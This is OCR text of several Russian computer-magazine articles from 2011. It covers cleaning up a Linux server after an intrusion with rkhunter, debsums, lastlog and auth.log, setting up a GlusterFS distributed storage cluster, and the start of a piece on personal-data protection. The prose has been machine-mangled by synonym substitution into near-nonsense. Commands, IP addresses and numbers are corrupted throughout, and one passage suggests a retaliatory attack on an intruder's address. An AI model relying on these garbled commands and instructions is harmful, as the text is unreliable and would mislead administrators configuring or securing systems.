09 - 07:59 58 - 03:27 5Б - 07:5Б 45- 07:5Б 35- 07:5Б 32 - 07:32 ЭВ - 07:З2 29 - 07:32 ВБ - 07:29 54-17:85 89 - 02:5З В4 - 02:85 В2 - 02:84

И швырнуть переоборудование базы да проверку системы: В сравнении со

# /usr/bin/rkhunter --update # /usr/bin/rkhunter --check Заметь, зачем следуе т означать точный траектория вплоть до приложения, тогда

медвежатник был способным решать на указатель /Ьin свою версию утилиты, да без указания пути возлюбленная полноте найдена первой . Отчет гkhunteг вывалится в консоль, во нем будут указаны по сию пору возможные проблемы. К сожалению, одну куда важную материя гkhunteг от действовать безвыгодный может. В нормальной ситуации сия утили та nозволяет свершать сверку кон­ трольных сумм всех системных файлов вместе с целью выявления факта их

модификации, однако, даже если прежде сего момента гkhunteг отнюдь не был установ­ лен равно его хранилище отнюдь не была обновлена, возлюбленный отнюдь не полноте понимать nравильные кон­

lastlog повеление last дает побольше детальную информацию

> lastlog

Useгname гооt

Рог!

Fгom

pts/3

08.157.22 04

Latest Thu Jul

0121:З9:41

+8688 0811 logged in•• logged in•• **Неvег logged in•• ••Neveг logged in•• ннеvег logged in** ••Neveг logged in•• ••Neveг logged inн Thu Jul 01 08 :87 :47 +8668 0811 нNеvег logged iП** ••Neveг logged in•• ••Неvег logged iП** ••Неvег logged iП**

••Neveг ••Neveг

bin daemon mail ftp http nobody dbus j1m avahi deluge hal

tty1

incгon

трольные суммы. Здесь для подспорье рядом ходят стандартные инструменты управления движение кета ми. Дело во том, в чем дело? пакеты любого дистрибутива со­

держат во себя контрольные фонды всех его файлов, исnользуя которые,

lastlog покажет,

не без; какого

IP равным образом эпизодически были

совершены по сию пору входы во систему

хватает совсем нечего делать обманывать nроверку. Например, дабы учинить сие на

Fedoгa/RHEL, нужно нанять на командной строке следующее:

subsystem request for sftp Ьу user root reverse mappiпg checking getaddriпfo for Х.Х.Х.Х [Х.Х.Х.Х] failed - POSSIBLE BREAK-IN АТТЕМРТ!

# rpm -va В DeЬian / Ubuntu сие выработать сложнее. Прид ется обычай новить куль

В

debsums:

09 случаях изо ста сии строки будут значить, в чем дело? во систему

вошли, используя неоригинальный переизбыток паролей, которому в большинстве случаев

предшествует огромное контингент заnисей вида:

# sudo apt-get install debsums И заnустить одноименную утилиту:

# /usr/bin/debsums

Failed password for root from

Х.Х.Х.Х

port 0473 ssh2

Причем начальный IР-адрес на этом случае может равно неграмотный соприкасаться из

-са

тем, из которого произошел вход,- взломщики в большинстве случаев используют Правда, вкушать вероятие того, аюшки? грабитель заменил базу жете ке­

бота в, которые сидят возьми второй машине, непрерывно сканируют

тов иначе не выделяя частностей стер ее позднее установки бэкдора, однако такое проис­

яруча равно пытаются поддернуть парали для открытому

ходит издали неграмотный всегда.

нанять команду левого

0Mi•illtt4WJ Теперь самое сезон узнать, который равным образом каким образом попал на машину.

SSH. Далее можно lastlog, которая должна заверить быль входа со

IP. Ее силлогизм может фигурировать приближённо таким:

root pts/3

Х.Х.Х.Х

Thu Jul 01 01:39:41 +8688 0811

В этом деле выше- важнейший друг- сие лаги. Если грабитель забыл или безграмотный успел отчистить лаги- нам страшно пове зло, в такой мере что они

Подтверждение дозволительно сыскать равно во выводе команды

last.

В любом

способны разгласить насчёт нем nочти все. Но какие лаги нам нужны?

случае, твоя милость будешь уметь IР-адрес взломщика, какой-никакой не запрещается про­

На серверах во первую хвост желательно проэкзаменовать журналы различных

смертным боем из через

сетевых сервисов :

сего не запрещается набросать жалобу для электронный код nровайдера да

apache, vsftpd, sam ba да т.д. На домашних машинах

whois, с намерением распознать кличка его инет-провайдера. После

просто-напросто сего заурядно нет, благодаря тому во nервую кортеж подобает взирать во

вверяться сверху его познавание (хотя сие редкость! иначе поnробовать

сторону

пристроить ответную атаку

SSH, кто многократно иногда запущен по мнению умолчанию.

SSH-cepвep пишет по отношению (безlуспешных усилие х лаги бери на /va г/ log /

:1.

Если хакинг произошел посредством дыру на одном изо сетевых сервисов,

auth.log (точнее, из-за него сие делает PAMI. Кроме SSH, после этого будут да лаги

лаги да , вернее всего, безвыгодный nомогут (хотя они могут зафикси ровать эпизод

других сервисов, ась? на общем хорошо. Просмотрим обложка не без; конца на

смены пользователем привилегий либо — либо падения сервиса на результате

поисках строк следующего вида:

одной с неудачных попыток внедрения шелл-кода!. В этой ситуации следует руководиться косвенными уликами, такими во вкусе от­

Accepted password for root from pam_unix_session(sshd:sessioп) :

root Ьу (uid=8)

022

Х.Х.Х.Х

port 03241 ssh2 session opened for user

крытые се тевые соединения равно следы, оставленные взломщиком на

системе, а да лагами системы аудита, когда симпатия установлена 0 /.'i.мl.

log/aud itd .l og l.

ХАКЕР

01/154/2011


Зализываем раны

USER_PROCESS

SYS_CALL_TABLE

SYS_LIB

syscall1

г-

---.

syscall2

г-

г+

syscaiiЗ

r-

г--+

... ...

~ ... r

KERNEL

alter_syscaiiЗ

cQ,

0

alter_syscall1

USER MODE

Руткит, реализованный во виде загружаемого модуля, может модифицировать чуть было не любую функцию

ЧТО ДАЛЬШЕ?

......

..,_

--

г--

с0120020

;;;

с0120031

~

"' ф

""3 =-

с0120042

ф

..."'

Q.

evil_fuпcЗIJ

-

--

ф

""3 =ф

evil_fuпc21J evil_fuпc1()

KERNEL MODE

(

HARDWARE

HARDWARE

)

были описаны на первой части статьи, равно выслать постоянно возможные за­

О к, автор сих строк узнали, вроде бандит проник на систему, кто именно дьявол равным образом зачем успел

кладки. Также игра стоит свеч рассмотреть однако чуть важные

изменить. Но в духе отыграть ОС на первоначальное состояние, избавив

конфигурационные файлы: во-первых, файлы системных настроек

ее с всех скрытых входов, оставленных взломщиком? Прост ой да

дистрибутива, во-вторых, настройки всех сетевых сервисов !если

самый исправный опровержение держи оный вопрос: переустановить безвыездно не без; нуля.

остались настройка ото ранее удаленных шаг кетов, их должно удалить]. По

Ведь ажно неравно твоя милость переустановишь ядро, безвыездно пакеты равно проверишь

потенциал достаточно обследовать по отношению ко всему по сию пору кон фиги, то и дело взлом­

по сию пору настройка получи и распишись объект вмешательства, миздрюшка безвыгодный даст гарантии, что-то

щики оставляют кровный знак во самых неожиданных местах. Чтобы най­

где-нибудь безвыгодный остался бэкдор, тот или другой сработает на самый неожи­

ти файлы, далеко не принадлежащие танцевальный шаг кета м, позволено утилизировать утилиту

определённый момент. Полную гарантию может подать только лишь пере прибор

cгuft-гemoveг !для DeЬiaп/Ubuпtul:

всей системы. Если а в области каким-либо причинам всю систему переустановить

# apt-get install cruft

невозможно, должно и так бы познать навести погреб риски.

01

Для сего необходимо переустановить целое пакеты. Каждый дистрибутив

# cruft-remover --no-act find

позволяет сие сделать, например, во OeЬiaп/Ubuпtu переустановка

01

лишь происходит так:

# cruft-remover cleanup --all

#

dpkg-recoпfigure

-phigh

смотрим,

что-нибудь нашлось

удаляем

Сразу в дальнейшем зачистки стоит только определить гkhuпteг равно привести в действие его в режиме сборки контрольных сумм:

Софт, принятый с исходников, переустанавливается или удаляется руками. Далее долженствует протестировать всегда места, которые

# rkhunter --propupd Установщик гkhunteг пропишет на систему сгоп-скрипт, тот или иной

> гkhunteг --check

короче эпоха ото времени совать утилиту равным образом подвергать проверке ОС получи и распишись из­ System check:s summaгy

Fi \е

мененные файлы. Чтобы сведения по части пр облемах сыпались на твой по­

ргорегt ies checks . . . Fi\es checked: 02В Suspect files : В

Rootk i t checks ... Rootki ts checked Poss iЬ\e гootkits:

0В9 В

чтовый ящик, добавь на конфиг /etc/гkhuпteг.coп f следующую строку:

MAIL-ON-WARNING; "root"

0:1§1:1•1!11 Оправиться потом взлома невыгодный завсегда легко, хацкер может потереть твои

Applicotions checks . . . App\icotions checked: 0 Suspect opplications: В

файлы равным образом своровать конфиденциальные данные. Но ото общей сложности сего доволь­

The system checks took: 0 minute and 04 seconds

0. Всегда обновляться систему. 2. Запретить парольный въезд в соответствии с SSH. 3. Убрать с системы лишние сетевые сер висы.

А 01 гesu\

ts have been ..,.. i tten to the \ogfi \е ( /vаг 0 log/гkhunteг . logJ

One ог тоге waгnings hove been found whi \е checking the system. Please check the log file (/vaг/log/гkhunteг.logJ

только прямо-таки уберечься, кабы глядеть на кого трем нехитрым правилам:

В этом случае ажно самый сорганизованный слесарь отнюдь не сможет Результатпроверки системы от через rkhuпter

ХАКЕР

01 /154/ 0011

пробраться во твою систему . :Х:

023


SYN/ACK

Евгеньюшка Зобнин

[execblt.rul

\"J

на твоеи компании СОЗДАЕМ РАСПРЕДЕЛЕННОЕ ХРАНИЛИЩЕ ДАННЫХ С ПОМОЩЬЮ GLUSTERFS Когда говорок заходит об организации распределен­

ногоотказоустойчивого хранилища данных, многие

-

usteгFS- сие распределённая линейно масштабируемая файловая доктрина не без; из-за щитой ото сбоев. Она позволяет

Описание опций

томов :

htto:Ublt.Jy/nV9no8

размежевать жесткие диски нескольких серверов на одно большое хранили ще от репликацией, либо эеркалированием данных, на ряд машин равным образом возможностью динамического расширения. Во

многом возлюбленная похожа держи файловые сис темы lustгe да

хотя , на лента

через последних, отнюдь не имеет выделенных серверов управления мета­

ры вспоминают что до файловой

данными, чтосказывается напроизводительности,нопозволяет

системе lustгe, сделано многие

совершить кластер паче простым равным образом управляемым. GlusteгFS никак не требует поддержки ФС на ядре, посему ее довольно прямо-таки основать да ис­

годы используемой к

пользовать во гетерогенных средах, sos тоящи х изо машин, поддержи­

хранения данных во самых

FUSE ILinux, Fг eeBSD, NetВSD, MacOS Xl.

вающих файловые системы пространства поль зова теленок из помощью Возможности файловой системы достаточно широки, равно во этом пла­

больших кластерах мира. Однако у lustгe кушать мно­

отнюдь не возлюбленная превосходит многие аналоги:

попросту сорганизовать равным образом настро­

ить. Поэтому пока я по­ говорим в отношении ее больше азбучный

Поддержка передачи данных сообразно каналам

TCP/ IP да

lпfiпibaпd RDMA равным образом

TCP/IP. • • •

Автоматическое освежение по прошествии сбоев. Возможностьавтоматическойрепликацииданныхпоузламкластера. Подключаемые балансировщики нагрузки, позволяющие подстро­

ить пропускная способность ФС перед конкретную задачу.

во использовании замене лещадь

названием GlusteгFS .

Хорошая масштабируемость, близкая ко О111lхранилище может до­ стигать размера на десятки петабайтl.

жество проблем равно ее отнюдь не что-то около

02/0

ceph,

системные администрато­

Несколько механизмов аутентификации: << логин-пароль »,

MySQL,

LDAP.

ХАКЕР

01/154/2011


Форт Нокс пользу кого твоей компа н ии

[ Cli ents/Apps

W1

Cli ents/Apps

0}J

trace -

••• 0 Cll ents/Apps 0}J

позволяет принести трассировку выполнения запроса

ввода-вывода .

i o- st ats - со б равно рае т статистику операций ввода-вы зажор . ..ol

"11

,.

..

Конечным модулем це п прицел во всякое время является тра н от п вектор н ый модуль sегvег сиречь clieпt, обеспечивающий сделка данными по сети. Полный инвентарь документированных трансляторов позволяется

обнаружить странице GlusteгFS [ http://euгope.g i usteг.oгg/commuп ity/

"' Gluster Global Namespace (NFS, CIFS, Gluster Native) Application Data

l.d _

~ О

iiili.:'

l.d

documentation/index . php/Tгaпslatoгs l . Несколько сторонних транс­ ляторов опять же было создано на рамках проекта CloudFS/HekaFS

[http://clou dfs.oгg l.

~

'\

'

MnЩel:ik!i Клиент равно сервер GlusteгFS реализованы от через интерфейса

FUSE.

Gluster Virtual Storage Pool

Это значит, что такое? интересах установки файловой системы бери типичную

Liпuх-машину достанет инсталлировать дистрибуционный пакет или сконцентрировать систему изо исходников, перевелся необходимости патчить ядро или аж п ерезагружать машину. Например, во Ubuпtu инсталля ц ия

\..

производится следующим образом:

0. Клиенты могут почерпнуть проход ко облаку

Glusterfs несколькими

разными способами

Устанавливаем пакеты, необходимые для того установки да функциони­

рования G l usteг F S-клиeнтa да сервера:

$ sudo apt-get

iпstall

ope nss h -server wget пfs-common

Возможность испо л ьзования BeгkeleyDB с целью эффектив н ого хране­

0. Скачиваем да устанавливаем депеша GlusteгFS [это делать нечего сде­

ния множества мелких файлов. Возможность подключения модулей в целях кэширования равным образом включе­

лать как бы держи клиентских, таково равным образом получи серверных машинах!:

ния таких функций в качестве кого Read-Ahead [упреждающее чтение! да Wгite­ B eh i пd [отложенная вслед п ись ! д ля улучшения п роизводительности.

$ wget ht tp://download.g l uster.com/p ub/g lu ster/

Функция восстановления удаленных файлов .

glusterfs/L ATEST/Ubuntu/glusterfs_3.2 . 0- 0_amdб4.deb

Возможность шифрования данных. Гибкий мехнизм трасси р овки, п озвол яю щ ий оказать узкие места на

$ sudo dpkg -i glusterfs*.deb

работе ФС. Простота развертывания да настройки . Н аличие

N FS-клиента,

кой п озволяет получитьдоступ для дан­

ным кроме использования клиента GlusteгFS.

0. Теперь нужно обнаружить порты, необходимые к работы файло­ вой системы. Сервер GlusteгFS слушает штаны 04007, 04008, а также в области одному порту на возрастающем порядке получай произвольный bгick

[то вкушать экспортируемый каталог!, вдобавок во обсчитывание идут далеко не толь­ Больши н ство с п е р ечис л е нн ых функций файловой системы неграмотный

ко каталоги текущего сервера, н касательно да лишь кластера на целом [это

являются неотъемлемой более или менее GlusteгFS, а подключаются для серве­

связано от тем, ась? всё-таки серверы кластера GlusteгFS равноправны

ру со через подвижно ради г ружаемых модулей, эдак называемых

равным образом могут взяться использованы на nодключения ФС со клиентской

трансляторов, идею которых авторы G l usteгFS переняли у разработ­

стороны!. Если предполагается оборот NFSдля монти­

чиков GNU/ H aгd [на часть но п ринципе основана подсистема GEOM на

рования файловой системы, годится выявить морские ворота

ядре FгeeBSDI. Трансляторы позволяю т не замечать все в одинаковой степени кто задание в

как бы сие делается от через iptaЫes:

011.

При мер,

проход ко файловой системе помощью ц е п очку специальных обработчи­ ков , отдельный с которых может осуществлять надо запросом да переда­

ваемыми на его рамках данными достоверный подборка действий. Не­ которые трансляторы держу пари т из-за шифровка данных , другие- за кэширование, третьи легируют безвыездно следовать п росы. Мощь трансляторов за­ ключается во том, ась? их не грех совмещать на цепочки полностью

произвольным образом вроде н а стороне сервера, в такой мере равно получи и распишись стороне клиен т а. Э т ото инструмент позволяе т соз д ать действитель н по отношению гибкую систему, которую дозволено подстроить приземленно перед любую задачу.

INPUT -m state --state NEW -m tcp - -dport 041307:241347 -j АССЕРТ $ iptaЫes - А INPUT -m stat e --state NEW - m tc p --dport 011 -j АССЕРТ $ iptaЫes - А INPUT -m state --state NEW -m udp --dport 011 -j АССЕРТ $ service ipt aЫes save $ service iptaЫes restart

$

ipt a Ьles -А

tcp

\

tc p

\

udp

\

Наиболее важные равным образом п олезные трансляторы перечислены ниже:

posix - интерфейс ко файло на ой системе UN IX, используемой к

Эти команды желательно претворить получи каждом GlusteгFS-cepвepe.

хранения д анных [это заключительный шарнир цепочки трансляторов!.

Каких-то особых требований для самим серверам безвыгодный предъявляет­

replicate- реплицирует причина в кругу несколькими узлами. readahead - производитупреждающее чте н ие.

ся. Достаточно, в надежде некто имел сердце компьютера архитектуры х86_64,

wгitеЬеhind -объе д иняетоперации еженедельник блоков да производит

памяти. В качестве канала рычаги посреди серверами равным образом клиентом

равно как худо-бедно

0 Г б дискового пространства равно 0 Г б оперативной

их после одну об п ерацию .

рекомендуется исnользовать гигабитные сиречь 00-гигабитные

io-threads - рас п араллели вает относительно п бретер ц ии чтения/записи. io-cache- кэширует читаемые блоки данных. stat-prefetch - производит предварительную загрузку каталого­

еthегnеt-каналы, либо lnfiniBand [OFED 0.5 равным образом выше! . Работос п о­ собность сервера протестирована во дистрибутивах

выхзаписей[позволяетбеззадержеквыполнятьтакиеоперации,

RHEL 0.1, Ubuntu равно Fedoгa, одначе позволительно воспользоваться оставшиеся дистрибу­ тивы равным образом операционные системы вместе с nоддержкой FUSE. В каче-

равно как «просмотр сод ержимого каталога >> !.

стве хранилища данных используется низлежащая файловая

quota - позволяет прибить квоту получай

системасервера,разработчикирекомендуютиспользоватьдля

доля записываемых

файлов большого размера такие ФС на правах Ext4, ЕхtЗ, либо XFS.

данных.

trash -

помещает всегда удаляемые файлы на «корзину >> не без; возможно­

стью последующего восстановления.

ХАКЕР

01/154/2011

Также подойдут, однако могут коптеть медленнее, любые другие РОSIХ-совместимые ФС.

025


SYN/ACK

Мадвrаскар

ИНДIIЙСКИЙ oкeatt

Аfланп1ческиn

Океон

Среди пользователей

GlusterFS много

<>

юА,Щанные игра в карты

@2011 Geocentre

ConsuШng,

Mapllnk,

крупных компаний в области всему миру

СОЗДАЕМ РАСПРЕДЕЛЕННОЕ ХРАНИЛИЩЕ

State: Peer in Cluster (Connected)

По вместе с ле того, вроде GlusteгFS довольно установлен получи и распишись серверы, позволяется при­ ступить для созданию распределенного хранилища. Эта процедура состоит с двух шагов. Сначала безвыездно серверы нельзя не объеди­ нить во безраздельно поголовный объединение , так кушать отнести за счет серверам , почто впредь они являются фрагментарно одного большого хранилища равно могут питать доверие побратанец

Hostname: 092.168.0.3 Uuid: 0e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Peer in Cluster (Connected)

др у гу. Делается сие по очереди в целях каждого сервера из помощью команды << glusteг рее г ргоЬе

IP». Чтобы свести во соглашение неудовлетворительно серве­

ра , перед со таточно прийти в сервер [любой) справами гооt да выполнить команду на отношении любого другого сервера . Например:

$ ssh # gluster peer probe 092.168.0.2 Probe successful

Hostname: 092.168.0.4 Uuid: 0e0cabaa-9df7-4f66-8e5d-cbc348f29ff7 State: Pfde43e - 0533-4e33-4f77-ed3984da21ae State: Peer in Cluster (Connected) На втором этапе пристало сформировать тома, ведь питаться логические

разделы, которые будут таить в себе данные, распределенные объединение не­

скольким серверам. Текущая трансформирование GlusteгFS Теперь серверы

092.168.0.1

да

092.168.0.2 образуют

соглашение изо двух,

доверяющих дружище другу серверов, имеющих вполне одного сукна епанча

[3.2.1) поддерживает

0 подобно томов, отличающиеся способом разделения данных между серверами:

права. В дальнейшем все в одинаковой степени какой изо них дозволительно довольно проэксплуатировать для подключения файловой системы от клиентской стороны, а строй

самоё решит, получи и распишись который-нибудь сервер посылать требования сверху чтение/запись файлов .

Distributed- распределяет файлы в лоне двумя да побольше серве­ рами, быть еженедельник узловой обложка подходит получи начальный сервер, второй- на второй равно т. д . Это самый о многом говорит лицо распределенной сети, что

Следующие серверы дозволительно присыпать на объединение определённо таким но об­

ра з ом [причем из любого изо поуже входящих на картель серверов):

мирово к лицу на томишко случае, рано или поздно значимость имеет совместный размер хранилища, а заморочка надежности хранимой информации решается другими методами, например, организацией

# gluster peer probe 092.168.0.3 # gluster peer probe 092.168.0.4

RAID -1 массивов

в

каждом сервере. Иначе близ выходе одного с узлов изо строя данные будут потеряны. Чтобы разбудить распределенное хранилище, до­ статочно реализовать простую команду в любом изо входящих во картель

Далее бери каждом сервере надо разработать каталог, какой

серверов:

хорэ использован в целях хранения данных [имя отнюдь не имеет значения):

# mkdir /data С через команды <<glusteг рее г

status >> не грех протестировать со­

выстаивание п ула равным образом всех его членов :

# gluster peer status Number of Peers: 0

Hostname: 092.168.0.2 Uuid: 0e987bda-16dd-43c2-835b-08Ыd55e94e5

026

# gluster volume create new_volume transport tcp 192.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data Volume Name: new_volume Туре: Distribute Status: Created Number of Bricks: 0 Transport-type: tcp Bricks: Brick1: 092.168.0.1:/data Brick2: 092.168.0.2:/data

ХАКЕР

01/154/2011


Форт Нокс интересах твоей компании

в среде серверами, да размещение блоков данных. В подле мере, при­ веденном выше, сие короче смотреть так: фанера первого файла достаточно

0ОWП ADМIIIIODE 0

Eifiiil.li::-ili"*

*·fi·' IM MHIЦ!.i+IF

поблочно делиться посередь первыми двумя серверами, второго -между двумя вторыми равным образом т.д. При чтении нескольких файлов считы­

[м--" Dom вinj

L"'.,_" OomoinJ

вание данных почти что в в таком случае же время пойдет враз от четырех серверов.

ОО О

Таким а образом допускается сочетать Distгibuted и тoмa да нахватать едва сеточный по образу и подобию

+Щ -.:Щ-.1+

Repiicated-

RA!D10:

-:::

·;:

# gluster volume create new_volume replica 0 transport tcp 092.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data

касательно

Так весь круг обложка хорэ продублирован бери двух серверах !пер­

с о

i

вый- получай первых двух, второй- держи вторых] равно автор сих строк получим хорошее

0

0:

руя небо и земля типы томов !на самом деле сие типы трансляторов]

!!'"

да других трансляторов от через G!usteгFS позволено унаследовать самые

аналогия надежности да размера хранилища. Вообще, комбини­

неожиданные комбинации, включительно тенетный тождество любого с

об

и;

типов

RAID.

Теперь, эпизодически книжка создан , подобает сдержать лимб машин, кото­

рые могут нажить для нему дорога !другими словами, смонтировать

том]. Для сего должно переработать сам с атрибутов тома:

# gluster volume set new_volume auth.allow 092.168.0.* Так выглядит кластер GiusteгFS возьми бумаге

Далее томище нужно « лукнуть >>, ведь очищать высказать системе, что-то она может начать для инициализации тамара , да подготовить его ко под­

Brick3: 092.168.0.3:/data Brick4: 092.168.0.4:/data

ключению со стороны клиента:

# gluster volume start new_volume Starting volume new_volume has been successful

Так пишущий сии строки создадим том, рассроченный в соответствии с четырем серверам,

универсальный границы которого достаточно оформлять сумму размеров каталогов

0

data всех серверов.

НАСТРАИВАЕМ КЛИЕНТ G!usteгFS позволяет заразиться вход ко тому тремя различными мето­

Replicated- зеркалирует документация среди двумя равным образом побольше сервера­ RAID1 . Хорошо годится на тех ситуациях, в отдельных случаях первосте­

дами: из через стандартного giusteгfs-клиeнтa, который-нибудь устанав­

ми, подобие

ливается дружно от пакетом G!usteгFS, NFS-клиента, поддерживаю­

пенное важность имеет ответственность равным образом выская доходчивость хранимой

щего третью версию протокола, да CIFS, в таком случае снедать сетевое окружение Windows . Стандартный заборщик пустить в ход элементарнее всего, для тому но

информации. Создается не без; через следующей команды:

дьявол дает самый высокую производительность:

# gluster volume create new_volume replica 0 transport tcp 092.168.0.1:/data 092.168.0.2:/data Так наша сестра nолучим том, показатели которого nродублированы получи и распишись двух

# mkdir /mnt/new_volume # mount -t glusterfs 092.168.0.1:/new_volume \ / mnt /new_volume

серверах !использовать цифра сервера для того этой задачи откровенно из­ быточно], его широта довольно равен наименьшему объему каталога /data.

Так автор сих строк примонтируем волюм пew_volume для каталогу /mnt/пew_

voiume . В кач е стве адреса сервера не возбраняется адресовать адресок любого Striped- записывает способности небольшими блоками поочередно RAID1. В различие через Distгibuted, экой

нате двушничек равно паче сервера, своего рода

фолиант оперирует блоками данных, а безграмотный целыми файлами, потому-то ока­ зывается особенно эффективным на тех ситуациях, когда-когда нужно

заручиться высокую темп чтения/записи про множества процес­ сов. Для его создания используется следующая команда:

# gluster volume create new_volume stripe 0 transport tcp 192.168.0.1:/data 092.168.0.2:/data Для пока что большего распараллеливания календарь да чтения можно использовать комбинацию Distгibuted равным образом Stгiреd-томов. В этом случае

составляющая распараллеливания !цифра 0 задним числом stгipe на примере выше] повинен бытийствовать на неуд раза меньше, нежели контингент серверов

> glusteг Numbeг

of

реег

status 3

Реегs:

Hostname: 092.168.0.2 Uuid: 0e987bda-16dd-43c2-835b-08b7d55e94e5 State: Реег in Clusteг (Connected) Hostname: 092.168.0.3 Uuid: 0e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Реег in Clusteг (Connected)

хранения:

# gluster volume create new_volume stripe 0 transport tcp 192.168.0.1:/data 092.168.0.2:/data 092.168.0.3:/data 192.168.0.4:/data Так разом хорошенького понемножку выходить равно расположение файлов

ХАКЕР

01/154/2011

Hostname: 092.168.0.4 Uuid: 0e0cabaa-9df7-4f66-8e5d-cbc348f29ff7 State: Pfde43e-4533-4e33-4f77-ed3984da21ae State: Реег in Clusteг (Connected) Проверяем гражданское состояние пула

027


SYN/ACK из входящих на объединение серверов, дьявол хорош использован всего к по­

лучения файла-описания тамара [volfile), что был продублирован между всеми серверами вот сезон запуска тома. Руководствуясь описанием тома, покупатель самостоятельно решит, для какому серверу подключать­

ся, с целью оприходовать иначе зацитировать способности [логика работы GlusteгFS такова, который основную работу выполняют не ась? иное клиенты, в этом случае что

серверы отвечают только лишь ради партитура равным образом отдачу данных). Чтобы фолиант ментировалея кайфовый миг старта операционной системы,

долженствует подложить во /etc/fstab следующую запись:

092.168.e.1:/new_volume glusterfs defaults,_netdev

е е

Для подключения тамара на операционных системах, невыгодный имеющих

поддержки FUSE [например, Solaгis не так — не то OpenBSD), допускается использо­ вать NFS-клиент [важно исnользовать то-то и есть nротокол ТСР):

# mount -о mountproto=tcp -t nfs 092.168.e.1:/new_volume /mnt/new_volume

> gluster volume create ne~_volume transport tcp +192.168.0.1:/data 092.168.0.2 :/data +192 . 068 . 0.3:/data 092.168.0.4 :/data Volume Name: ne~ volume Туре : Oistribute Status: Created Number of Bricks: 0 Transport- type: tcp Br icks: Brick1: 092.168.0.1:/data Brick2: 092.168 . 0.2:/data Bric k З: 092.168 . 0.3:/data Brick4: 092.168.0.4 :/data Созд а ем н касательно вый волюм

0.

Выnолнить ребалансировкутома:

Для монтирования в промежуток времени загрузки добавляем следующую

строку во /etc/fstab:

# gluster volume rebalance new_volume start 5tarting rebalance on volume new_volume has been successful

092.168.e.1:/new_volume /mnt/new_volume nfs defaults, _netdev,mountproto=tcp е е

Если а никуда не денешься облечь в тело и кровь замену одного сервера другим

[апгрейд сервера), вереница команд бросьте следующей: Для того с тем nодключить GlusteгFS-тoм изо операционной системы семейства

Windows,

никуда не денешься nроизвести настройку

0.

Добавляем сервер во nул равным образом новоявленный брик на том:

Samba-cepвepa, кто достаточно устанавливать книжка стандартными средствами да расшаривать его

делать нечего найти блок

no протоколу CIFS. Чтобы произвести это, samba для одинокий с GlusteгFS-cepвepoв

# gluster peer probe 092.168.е.5 # gluster volume add-brick new_volume 092 . 068 . e . 0:/data

[или получи и распишись специализированный сервер), смонтировать книга из через стан­ дартного glusteгfs-клиeнтa, прикинуть на обложка /etc/samba/smb.conf следующие строки:

0. Заменяем единственный брикдругим [заменить сервер 092.168.0.3 на 192.168.0.5):

[gluster]

# gluster volume replace-brick new_volume \ 192.168.e.3:/data 092.168.e . 0:/data start Replace brick start operat i on successful

comment=Gluster volume path=/mnt/new_volume read only=по guest ok=yes И nерезаnустить

0.

samba:

# gluster volume replace-brick new_volume \ 192.168.e.3:/data 092.168.e.5:/data start replace-brick commit successful

# /etc/init.d/sa mba restart Теnерь книжка принуждён фигурировать виден во сетевом окружении

Подтверждаем замену:

Windows-

0.

Удаляем былой брик с тома:

мaшин .

~ Само собою разумеется, что-то со временем GlusteгFS-клacтep может расширяться равно видоизменяться: сервера выходят с строя, им бери

замену приходят новые, текущих серверов становится недостаточ­

# gluster volume remove-brick test-volume \ 192.168.e . 0:/data Removing brick(s) сопение result in data loss . Do you want to Continue? (y/n) Enter "у" to confirm the operation. The command displays the following:

хотя в целях хранения всей информации равно т. д. Как взяться на зтих ситуациях? Все адски просто: глотать ряд команд, которые nозволят

Remove Brick successful

аллегро проделать всю необходимую работу. Например, ежели появилась

потреба во расширении кластера новыми серверами, необхо­

0. Удаляем сервер с пула:

димо предпринять следующее:

0.

Добавить серверы во nул из nомощью еще знакомой нам команды

«gl usteг рее г ргоЬе >> : # gluster peer probe Probe successful

# gluster peer detach

092.168.е.3

l:l§l:lei!UiJ 192.168.е.5

Кластерные технологии, уже

0 полет

взад казавшиеся уделом акаде­

миков во белых халатах, ноне nревратились на житейский

инструмент, хватает nростой во использовании да никак не требующий

0. Подключить для нужномутому недавний брик [каталог сервера):

каких-то глубоких знаний. Как твоя милость пелена убедиться, днесь наладка распределенного храни­

# gluster volume add-brick new_volume 092.168.e.5:/data Add Brick successful

028

лища данных- такая а nростая nроцедура во вкусе выжимание веб- не ведь — не то

фтп-сервера. :Х:

ХАКЕ Р

01/154/2011


Никуша Дыминекий

aka

0Зоz

Данная сочинение невыгодный претендует получай полное руководитель по мнению защите переанальны х данны х. Подразумевается , что выпивоха поуже ознакомился со самим текстом статьи

052 ФЗ, трехсторонним приказом ФСТЭК/ФСБ/

Роскомсвязьнадзора, 08-м приказом ФСТЭК равным образом прочими р е гламентирующими документами.

На страже переанальных ДаJ-Р

ЗАКОННО ЗАЩИЩАЕМ ПЕРСОНАЛЬНЫЕ ДАННЫЕ, НЕ ПОКУПАЯ КОТА В МЕШКЕ В старобытный однажды пишущий сии строки говорили относительно том, нежели занима­

ются безопасники, как бы из ними взаимодейство­ вать да дьяволом сие не выделяя частностей должно делать. Сегодня мы спустимся вместе с небес получай землю да поговорим по части

том, почто беспокоит архи многих сисадминов и безопасни ков,- по отношению том, во вкусе спасти наши пер­ еанальные эмпирика . Точнее, наши информацион­

ные системы переанальных данных [ИСПДн].

ассуждать в рассуждении том, в чем дело? значат те тож отдельные люди параграфы при­ казов, законов, нормативных актов равным образом положений, не возбраняется

ахти долго. Такими рассуждениями полны многочисленные ресурсы- с Хабрахабра вплоть до спе циали зирова нного ущелье та

ISPDN.RU,

приближенно ась? встретить всю необходимую информацию тебе отнюдь не составит труда. В зтой статье наша сестра поговорим об том, в чем дело? пока что выделывать со всей этой информацией. В общем случае, течение создания системы защиты переаналь­ ных данных состоит с следующих этапов:

0. 2. 3. 4. 5.

Определение информационных сис т ем п ереаналь ны х данны х; Классификация; Определениеактуальныхугрозбезопасностиперсональныхданны~ Выбор средств защиты; Развертываниете х нических средств равным образом построение сопутствующей документации;

0. Аттестация (пожеланию!. Прежде нежели пробежаться объединение сим пункта м, внесем разборчивость на тер­ минологию. Что такое <<инфо рмационная построение переанальных

данных »? По сути сие нейрокомпьютер (или сколько-нибудь компьютеров!, на которых обрабатывается (в волюм числе да прямо хранится! какая-то

ХАКЕР

01/154/2011

029


SYN/ACK

··---·-·--· -..,................. ·-__-__ --............... ~----····· ,

.. ,

